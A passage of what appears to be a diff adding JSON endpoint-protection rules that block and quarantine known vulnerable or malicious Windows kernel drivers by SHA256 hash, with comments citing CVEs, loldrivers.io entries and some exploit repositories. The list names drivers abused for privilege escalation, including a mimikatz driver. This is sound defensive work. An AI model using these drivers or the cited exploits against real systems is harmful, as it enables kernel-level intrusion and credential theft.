"test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.488170Z", + "creation_date": "2026-03-23T11:45:31.488172Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.488177Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0fa1f1e15af1793f292683e0ec1abb0ee60bf21a3ce8cd8792f859ead578e2ac", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "78f416b1-058f-5e1a-9dc4-1ab9965914b7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.981278Z", + "creation_date": "2026-03-23T11:45:29.981280Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": 
"2026-03-23T11:45:29.981286Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8ae383546761069b26826dfbf2ac0233169d155bca6a94160488092b4e70b222", + "comment": "Vulnerable Kernel Driver (aka BEDAISY.SYS) [https://www.loldrivers.io/drivers/db666d40-c9fa-4039-bfac-a5d7afd61b67/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7909bf95-a53e-57eb-a90f-ed8b8981f3a1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.975255Z", + "creation_date": "2026-03-23T11:45:29.975257Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.975262Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "37f16c8232ec679ee400c76272fc9b56977524e70cfd5cce375ab79f4750bf64", + "comment": "Vulnerable AMD Ryzen Master Driver (aka AMDRyzenMasterDriver.sys) [CVE-2020-12928, CVE-2023-20564] [https://www.loldrivers.io/drivers/13973a71-412f-4a18-a2a6-476d3853f8de/, https://github.com/tijme/amd-ryzen-master-driver-v17-exploit, https://github.com/zeze-zeze/HITCON-2023-Demo-CVE-2023-20562] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7913d6f9-9654-5c64-8d4f-7737b7911bfb", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + 
"test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.818860Z", + "creation_date": "2026-03-23T11:45:30.818862Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.818868Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "7690ef2838bda2327116243c1792090125b36a5840464e010acdd103f7369807", + "comment": "Vulnerable Kernel Driver (aka kerneld.amd64) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "791c6f5b-95b5-5737-80b8-af0fda71a54e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.160421Z", + "creation_date": "2026-03-23T11:45:31.160423Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.160429Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + 
"rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f2291c7a5f6e186bf095ecb2a86d4ad42ca413a8d8075ee486f5b1c82599a19d", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "792c92f7-1ec0-5043-87e3-2607a075b827", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.825386Z", + "creation_date": "2026-03-23T11:45:31.825388Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.825394Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "93d7bbc215f593f416e1582ed7426837cccacb2e2e599ded297c524c294e2869", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "79341eb9-dd29-519f-9cda-c91be93de50c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + 
"source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.820825Z", + "creation_date": "2026-03-23T11:45:30.820827Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.820832Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c586befc3fd561fcbf1cf706214ae2adaa43ce9ba760efd548d581f60deafc65", + "comment": "Vulnerable Kernel Driver (aka ComputerZ.Sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "793a11e2-38d9-5fce-99ae-19a431425fea", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.981296Z", + "creation_date": "2026-03-23T11:45:29.981298Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.981303Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0bd164da36bd637bb76ca66602d732af912bd9299cb3d520d26db528cb54826d", + "comment": "Vulnerable Kernel Driver (aka 
BEDAISY.SYS) [https://www.loldrivers.io/drivers/db666d40-c9fa-4039-bfac-a5d7afd61b67/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "795a64ed-a003-50c5-83bd-ee5f0070fe54", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.821944Z", + "creation_date": "2026-03-23T11:45:31.821946Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.821962Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0e833157a12ac6f032c43616f5d9506674cc860a85add76cbd9d007c3ad09ad3", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7960d647-9791-5344-a1ac-1759f380e604", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.974052Z", + 
"creation_date": "2026-03-23T11:45:29.974054Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.974059Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "e4d9f037411284e996a002b15b49bc227d085ee869ae1cd91ba54ff7c244f036", + "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7962022d-c3bf-5abb-9a67-2f7baf0bc17c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.815915Z", + "creation_date": "2026-03-23T11:45:30.815917Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.815923Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "1970400679c3ae7000f1ba3e0f12c2d5443df7fbb8947cabe45c7ae977806efb", + "comment": "Vulnerable Kernel Driver (aka FPCIE2COM.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
"7962e7af-6356-57cd-9dcc-693697680153", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.461906Z", + "creation_date": "2026-03-23T11:45:30.461909Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.461918Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ece76b79feafb38ae4371e104b6dcbb4253ff3b2acbe5bd14ce6e47525c24f4a", + "comment": "Malicious Kernel Driver (aka mimikatz.sys) [https://www.loldrivers.io/drivers/14556074-b235-4378-b356-f58721629d72/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7966a510-817b-5d16-8e0e-dd52c567a236", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.477026Z", + "creation_date": "2026-03-23T11:45:30.477029Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.477038Z", + 
"rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a1b56ae08d822bb5d041c2a67584371ffddcb7f6d69191efec5b8189e0028331", + "comment": "Vulnerable Kernel Driver (aka libnicm.sys) [https://www.loldrivers.io/drivers/2b949a0d-939f-456a-a34f-4589d7712227/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "796f755b-1889-544c-b4f6-b822c5beaf3a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.982730Z", + "creation_date": "2026-03-23T11:45:29.982732Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.982738Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a84bec9cf836c3abdc0f99e389c72041b6c2b1ba2921d272436e2b8a9b98afb1", + "comment": "Vulnerable Kernel Driver (aka d4.sys) [https://www.loldrivers.io/drivers/c2e70ee6-2f13-4d43-ad5a-c2bf033cc457/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7975ddd7-dd13-5557-ab6b-169625ce1219", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": 
"af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.972178Z", + "creation_date": "2026-03-23T11:45:29.972180Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.972185Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c21e7ce6ef61ee173e11104252c8d9a22a976f5dd61c83c2f54f363e67feee93", + "comment": "Intel Ethernet diagnostics vulnerable driver (aka iQVW64.sys) [CVE-2015-2291] [https://www.loldrivers.io/drivers/1d2cdef1-de44-4849-80e5-e2fa288df681/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "798055c0-66ae-54bd-bc3c-1858f90ba9db", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.494867Z", + "creation_date": "2026-03-23T11:45:31.494887Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.494893Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "165b01284ea23d63d615859002fa9d212fea61cffe9094deba8dc55ae40f177d", + "comment": "Vulnerable Adlice 
Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "79820787-2b97-5e4a-91e0-d2f89ef29a7f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.614753Z", + "creation_date": "2026-03-23T11:45:29.614755Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.614760Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "98b734dda78c16ebcaa4afeb31007926542b63b2f163b2f733fa0d00dbb344d8", + "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "7986f81c-f3e2-5314-9493-c9006a7d2be8", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": 
"2026-03-23T11:45:29.617661Z", + "creation_date": "2026-03-23T11:45:29.617663Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.617668Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "fb19f241ddae74ec4a0f87dff025ec68dc809f9dd883649c0e58822de28e6f1b", + "comment": "ATI Technologies vulnerable GPU flash tool (aka atillk64.sys) [CVE-2020-12138] [https://www.loldrivers.io/drivers/61514cbd-6f34-4a3e-a022-9ecbccc16feb/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "798f0449-f4be-577e-9c39-aacac3c3c61d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.476789Z", + "creation_date": "2026-03-23T11:45:31.476793Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.476802Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "87e396f5825bce67a694ab32e41c99e40312598edc6889a7c7f31c9f6414e4c4", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": 
"af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "799130e4-3639-5ecf-a992-df7a3cfe26ee", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.817793Z", + "creation_date": "2026-03-23T11:45:30.817796Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.817804Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "51859571d807d984e4f1cf145d5d74491feabd19327309c2c598c496a1976c70", + "comment": "Vulnerable Kernel Driver (aka dellbios.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "79a8e591-6acc-5c03-b18c-7a06f15f2538", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.979929Z", + "creation_date": "2026-03-23T11:45:29.979931Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": 
"stable", + "hl_testing_start_time": "2026-03-23T11:45:29.979937Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "66d59e646f3965bc5225eca4285ae65f34b8681fb1bee3eaf440f6795b2fa70f", + "comment": "Vulnerable Kernel Driver (aka FairplayKD.sys) [https://www.loldrivers.io/drivers/31686f0e-3748-48c2-be09-fc8f3252e780/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "79b143dc-4f06-554a-ab7c-b68fe01a84db", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.807465Z", + "creation_date": "2026-03-23T11:45:31.807467Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.807473Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0202d1edcd86145beb45be24f2af3d5b5652c28a6eef80b8518bee2df31bd347", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "79b2dac3-68ce-5168-89fc-a3423e0df862", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": 
"quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.484783Z", + "creation_date": "2026-03-23T11:45:31.484787Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.484797Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "4eaed32c4a725c43c3f5b5666a3c5d24fc89b435cf3d2388fdd37e856902204b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "79b8790b-36e6-5f62-b401-4604bc093ae2", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.621967Z", + "creation_date": "2026-03-23T11:45:29.621969Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.621975Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], 
+ "type": "hash", + "value": "9512115b60e67fa268a7463119add2404150842bb3dffa41124b12dd9cb580a2", + "comment": "ASUSTeK GPU vulnerable physmem driver (aka AsIO2_64.sys) [https://syscall.eu/blog/2020/03/30/asus_gio/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "79e848a9-6f06-5653-b5ee-49ee2ebc6b8d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.608544Z", + "creation_date": "2026-03-23T11:45:29.608546Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.608552Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + 